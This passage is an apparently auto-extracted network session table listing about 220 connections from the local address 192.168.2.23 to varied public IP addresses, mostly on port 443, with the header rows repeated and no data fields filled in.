                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20137192.168.2.2356652152.138.83.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20138192.168.2.2348770140.90.86.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20139192.168.2.2354176153.240.100.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20140192.168.2.2335004116.100.209.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20141192.168.2.234470096.254.237.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20142192.168.2.2346530114.235.191.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20143192.168.2.2352984112.25.199.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20144192.168.2.234917088.173.138.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20145192.168.2.2360920193.128.242.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20146192.168.2.235946292.6.194.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20147192.168.2.235587089.245.145.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20148192.168.2.2353102220.21.213.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20149192.168.2.2333138132.173.231.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20150192.168.2.2353884133.132.214.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20151192.168.2.23376781.196.58.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20152192.168.2.2357866108.115.58.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20153192.168.2.2356528184.97.182.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20154192.168.2.2352650122.13.38.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20155192.168.2.2338124121.57.98.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20156192.168.2.2347636166.166.84.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20157192.168.2.2355540163.124.161.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20158192.168.2.2358548171.99.210.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20159192.168.2.2343802121.120.146.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20160192.168.2.235199444.117.105.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20161192.168.2.2337622178.61.116.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20162192.168.2.2347312176.195.37.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20163192.168.2.2358950106.163.131.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20164192.168.2.233362634.16.83.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20165192.168.2.2334130118.231.133.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20166192.168.2.2350018161.252.146.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20167192.168.2.236019277.205.47.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20168192.168.2.2336248206.68.224.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20169192.168.2.2351934104.126.112.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20170192.168.2.2336822132.202.34.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20171192.168.2.2337638202.58.72.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20172192.168.2.2356800207.73.20.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20173192.168.2.234502885.18.222.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20174192.168.2.2355572146.250.158.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20175192.168.2.233518281.147.253.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20176192.168.2.236004088.23.26.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20177192.168.2.233619094.94.157.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20178192.168.2.2333854176.144.244.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20179192.168.2.233764842.46.19.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20180192.168.2.2334712145.65.8.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20181192.168.2.234414897.153.155.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20182192.168.2.234316044.249.35.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20183192.168.2.2358718182.73.31.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20184192.168.2.2341652112.243.146.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20185192.168.2.234398294.176.33.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20186192.168.2.235554240.118.52.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20187192.168.2.2334962122.183.220.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20188192.168.2.2339550101.145.84.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20189192.168.2.2353440182.174.122.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20190192.168.2.2354396157.159.9.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20191192.168.2.2355252180.244.104.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192192.168.2.2337476101.87.181.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20193192.168.2.2359004210.209.97.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20194192.168.2.2358268182.84.107.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20195192.168.2.233656271.207.32.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20196192.168.2.2350580166.34.207.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20197192.168.2.2345468126.20.152.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20198192.168.2.2346480159.235.71.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20199192.168.2.235560620.240.248.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20200192.168.2.2352354177.151.30.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20201192.168.2.23483349.161.202.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20202192.168.2.2341152183.50.132.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20203192.168.2.234107686.19.3.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20204192.168.2.2349138119.7.159.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20205192.168.2.2340310187.201.125.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20206192.168.2.2356342150.248.12.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20207192.168.2.2336762158.158.201.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20208192.168.2.2334376165.94.138.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20209192.168.2.23390868.163.246.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20210192.168.2.235673879.53.189.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20211192.168.2.2344010186.18.226.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20212192.168.2.2343240133.178.247.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20213192.168.2.2353418122.126.85.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20214192.168.2.2356266168.184.1.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20215192.168.2.2344130179.200.157.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20216192.168.2.2351576121.215.239.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20217192.168.2.234666075.120.197.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20218192.168.2.234674420.199.180.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20219192.168.2.2340246124.6.124.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20220192.168.2.2337970205.192.241.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20221192.168.2.2349706182.207.124.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20222192.168.2.235629051.248.221.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20223192.168.2.235671013.113.18.128080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20224192.168.2.2342398210.154.247.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20225192.168.2.2357884150.46.66.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20226192.168.2.2358128147.251.182.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20227192.168.2.2360196200.193.0.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20228192.168.2.2342246178.192.127.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20229192.168.2.233759886.41.165.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20230192.168.2.2356646130.223.62.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20231192.168.2.235675242.98.249.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20232192.168.2.234416899.201.30.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20233192.168.2.2334680129.30.138.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20234192.168.2.2341596195.35.140.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20235192.168.2.2343450220.175.73.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20236192.168.2.2333888105.73.102.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20237192.168.2.2355808202.134.13.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20238192.168.2.2342002142.115.72.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20239192.168.2.2338684111.52.54.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20240192.168.2.23447442.254.12.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20241192.168.2.2334918137.145.116.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20242192.168.2.2337316220.206.138.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20243192.168.2.234888491.230.28.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20244192.168.2.2338456210.242.188.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20245192.168.2.233778050.241.155.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20246192.168.2.2333682103.143.249.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20247192.168.2.233841449.105.138.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20248192.168.2.234595075.202.247.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20249192.168.2.2345744152.210.86.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20250192.168.2.2342878209.238.23.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20251192.168.2.2336358102.169.222.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20252192.168.2.2336194142.95.131.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20253192.168.2.2352648219.64.247.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20254192.168.2.2335682222.129.116.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20255192.168.2.233306618.235.15.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20256192.168.2.2347242181.50.175.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20257192.168.2.233406278.107.114.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20258192.168.2.234807647.200.79.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20259192.168.2.235968291.95.28.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20260192.168.2.2333354186.38.84.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20261192.168.2.2335440175.198.168.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20262192.168.2.2334006200.202.241.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20263192.168.2.234960013.27.100.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20264192.168.2.2340922119.74.86.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20265192.168.2.2343960200.88.31.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20266192.168.2.234366894.39.21.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20267192.168.2.234987214.183.82.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20268192.168.2.234818860.55.44.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20269192.168.2.2350254213.76.114.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20270192.168.2.234809297.44.105.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20271192.168.2.2336764112.202.135.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20272192.168.2.2333040207.130.219.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20273192.168.2.2356992133.96.109.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20274192.168.2.234023092.177.160.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20275192.168.2.2357662209.33.182.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20276192.168.2.2356836110.195.30.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20277192.168.2.2335476216.123.106.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20278192.168.2.2339792151.59.202.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20279192.168.2.2360180157.179.49.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20280192.168.2.2345664174.186.7.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20281192.168.2.2347958220.45.146.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20282192.168.2.2337898129.59.12.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20283192.168.2.234190213.179.170.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20284192.168.2.2346768113.107.162.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20285192.168.2.2339384161.151.71.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20286192.168.2.2360688207.160.33.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20287192.168.2.2359768202.235.141.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20288192.168.2.2346034159.41.21.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20289192.168.2.23426982.42.13.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20290192.168.2.2358658103.7.178.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20291192.168.2.234362260.197.120.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20292192.168.2.234183678.160.223.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20293192.168.2.233805881.98.44.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20294192.168.2.235944223.20.85.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20295192.168.2.234770659.232.251.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20296192.168.2.2358140211.67.233.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20297192.168.2.2349532140.198.93.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20298192.168.2.236050065.89.151.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20299192.168.2.2341982222.185.20.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20300192.168.2.2352244137.63.79.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20301192.168.2.2357370163.169.245.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20302192.168.2.2354972156.145.179.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20303192.168.2.2345860125.196.230.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20304192.168.2.2344210136.41.57.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20305192.168.2.2336116120.132.11.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20306192.168.2.2359042108.231.188.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20307192.168.2.2343002146.231.78.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20308192.168.2.2345868207.90.185.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20309192.168.2.233300897.150.179.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20310192.168.2.235570624.192.123.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20311192.168.2.234302888.171.164.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20312192.168.2.2347332200.16.84.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20313192.168.2.235587476.99.193.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20314192.168.2.2357434195.49.201.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20315192.168.2.2336120181.166.188.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20316192.168.2.2359150170.82.62.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20317192.168.2.2356628199.128.4.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20318192.168.2.2354414137.92.14.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20319192.168.2.2333656186.111.91.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20320192.168.2.2335352184.41.71.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20321192.168.2.2341812147.136.33.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20322192.168.2.235491418.170.95.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20323192.168.2.233597295.211.101.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20324192.168.2.2355282129.128.250.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20325192.168.2.2341656108.170.251.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20326192.168.2.233939268.91.100.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20327192.168.2.2350838189.87.108.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20328192.168.2.2354866157.30.88.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20329192.168.2.2352118137.246.103.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20330192.168.2.2342422212.199.249.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20331192.168.2.234097499.153.182.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20332192.168.2.233503650.95.171.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20333192.168.2.2358134106.95.213.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20334192.168.2.2348330132.34.217.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20335192.168.2.235088036.119.242.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20336192.168.2.2345978163.105.74.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20337192.168.2.235549677.118.83.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20338192.168.2.2347774182.251.26.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20339192.168.2.2350980193.137.188.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20340192.168.2.233397675.75.6.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20341192.168.2.2349438108.81.17.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20342192.168.2.2350156137.143.94.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20343192.168.2.2359318146.37.239.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20344192.168.2.234955868.217.75.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20345192.168.2.234001078.65.154.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20346192.168.2.2341380122.199.238.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20347192.168.2.2337332159.249.60.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20348192.168.2.233783475.69.188.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20349192.168.2.2341216223.106.19.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20350192.168.2.2343930171.192.20.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20351192.168.2.2342566168.96.137.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20352192.168.2.233639620.234.54.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20353192.168.2.2351114194.236.93.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20354192.168.2.2338540118.27.206.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20355192.168.2.2360000207.123.115.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20356192.168.2.233427881.127.15.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20357192.168.2.233600285.47.215.68443
                                                TimestampBytes transferredDirectionData


